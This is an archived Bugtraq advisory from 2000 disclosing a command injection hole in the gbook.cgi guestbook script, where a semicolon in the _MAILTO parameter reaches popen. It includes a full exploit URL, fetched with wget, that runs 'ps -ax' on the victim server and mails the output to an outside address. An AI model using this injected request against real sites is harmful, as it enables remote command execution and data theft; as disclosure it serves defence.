Bugtraq mailing list archives
[hacksware] gbook.cgi remote command execution vulnerability
From: JW Oh <mat () IVNTECH COM>
Date: Fri, 10 Nov 2000 20:38:44 +0900
Bug Report

1. Name: gbook.cgi remote command execution vulnerability

2. Release Date: 2000.11.10

3. Affected Application:
   GBook - A web site guestbook
   By Bill Kendrick
   kendrick () zippy sonoma edu
   http://zippy.sonoma.edu/kendrick/

4. Author: mat () hacksware com

5. Type: Input validation Error

6. Explanation
   gbook.cgi is used by some web sites. We can set _MAILTO parameter, and popen is called to execute mail command. If ';' is used in _MAILTO variable, you can execute arbitrary command with it. It's so trivial. :)

7. Exploits
   This exploit executes "ps -ax" command and sends the result to haha () yaho com.

   wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha () yaho com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe () yaho com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"

=================================================
|  mat () hacksware com                         |
|  http://hacksware.com                         |
=================================================